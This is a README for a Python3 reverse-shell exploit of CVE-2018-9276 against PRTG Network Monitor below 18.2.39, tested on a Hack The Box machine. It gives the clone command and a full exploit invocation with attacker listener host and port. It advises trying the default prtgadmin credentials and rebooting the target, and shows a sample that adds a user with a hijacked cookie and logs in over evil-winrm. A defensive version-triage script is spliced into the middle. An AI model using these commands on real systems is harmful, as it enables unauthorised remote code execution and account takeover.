CVE-2018-9276

CVE-2018-9276 PRTG < 18.2.39 Reverse Shell (Python3 support)

Dependencies

  • Impacket (python3 version)
  • Netcat
  • Msfvenom

Usage

git clone https://github.com/A1vinSmith/CVE-2018-9276.git

./exploit.py -i targetIP -p targetPort --lhost hostIP --lport hostPort --user user --password pass
  1. Credentials are needed to perform the exploit. Try the default credentials prtgadmin:prtgadmin. It might also be worth checking the database or logs to obtain them: https://kb.paessler.com/en/topic/463-how-and-where-does-prtg-store-its-data
  2. Try --lport 445 if the port is not already in use.
  3. There are a few twisted comments in the code. They might need some modifications.
  4. It might take a few attempts to succeed. Rebooting the target machine is always a good option, especially when your payload causes some impact.

Test coverage

HTB Netmon box

OS Name:                   Microsoft Windows Server 2016 Standard
OS Version:                10.0.14393 N/A Build 14393
OS Manufacturer:           Microsoft Corporation
OS Configuration:          Standalone Server
OS Build Type:             Multiprocessor Free
Registered Owner:          Windows User
Registered Organization:   
Product ID:                00376-30821-30176-AA362
Original Install Date:     2/3/2019, 7:05:45 AM
System Boot Time:          7/28/2021, 9:02:41 PM
System Manufacturer:       VMware, Inc.
System Model:              VMware Virtual Platform
System Type:               x64-based PC
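
For defenders, the affected range in this README's title (PRTG < 18.2.39) can be checked against an asset inventory. The following is an added example, not part of this repository's code; it assumes version strings in dotted numeric form (optionally inside a banner), and the hostnames and versions in the sample are constructed.

```python
import re

# First fixed release per this README's title ("PRTG < 18.2.39").
FIXED = (18, 2, 39)

# First dotted numeric run of 3 or 4 parts, e.g. "18.1.37.13946".
_VERSION_RE = re.compile(r"(?<![\d.])(\d+)\.(\d+)\.(\d+)(?:\.(\d+))?(?![\d.])")


def parse_version(text):
    """Return (major, minor, patch) from a version or banner string, or None."""
    m = _VERSION_RE.search(text or "")
    if not m:
        return None
    return tuple(int(g) for g in m.groups()[:3])


def classify(text):
    """'affected' if below FIXED, 'fixed' if not, 'unknown' if unparseable."""
    v = parse_version(text)
    if v is None:
        return "unknown"  # no usable version recorded: needs manual review
    return "affected" if v < FIXED else "fixed"


def triage(inventory):
    """Map {host: version string} to {status: [hosts]} with sorted host lists."""
    result = {"affected": [], "fixed": [], "unknown": []}
    for host, text in inventory.items():
        result[classify(text)].append(host)
    return {k: sorted(v) for k, v in result.items()}


# Constructed sample inventory (hostnames and versions made up for this example).
SAMPLE = {
    "mon-01": "18.1.37.13946",
    "mon-02": "PRTG Network Monitor 18.2.39.1661",
    "mon-03": "18.2.38",
    "mon-04": "17.4.35.3326+",
    "mon-05": "21.3.70.1629",
    "mon-06": "",          # version not recorded
    "mon-07": "18.10.1",   # numeric compare: minor 10 > 2, so not affected
}

if __name__ == "__main__":
    for status, hosts in triage(SAMPLE).items():
        print(f"{status:8} {', '.join(hosts) or '-'}")
```

Hosts reported as unknown should be checked by hand rather than assumed fixed. Because the exploit requires credentials, any instance still accepting the default prtgadmin account warrants a password change regardless of version.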

Credit

A big thank you to wildkindcc for the python2 version: https://github.com/wildkindcc/CVE-2018-9276

Expand Knowledge

Using metasploit

https://www.rapid7.com/db/modules/exploit/windows/http/prtg_authenticated_rce/

Manually exploit

https://www.codewatch.org/blog/?p=453

Remote Code Execution

https://www.exploit-db.com/exploits/46527

https://github.com/chcx/PRTG-Network-Monitor-RCE

Usage sample

Credentials are needed to perform the exploit. First log in and get the authenticated cookie, which is needed to add a new user.

./prtg-exploit.sh -u http://10.10.10.10 -c "OCTOPUS1813713946=XXX"

// Log in as the new user via evil-winrm
evil-winrm -i 10.10.10.10 -u pentest -p 'P3nT3st!'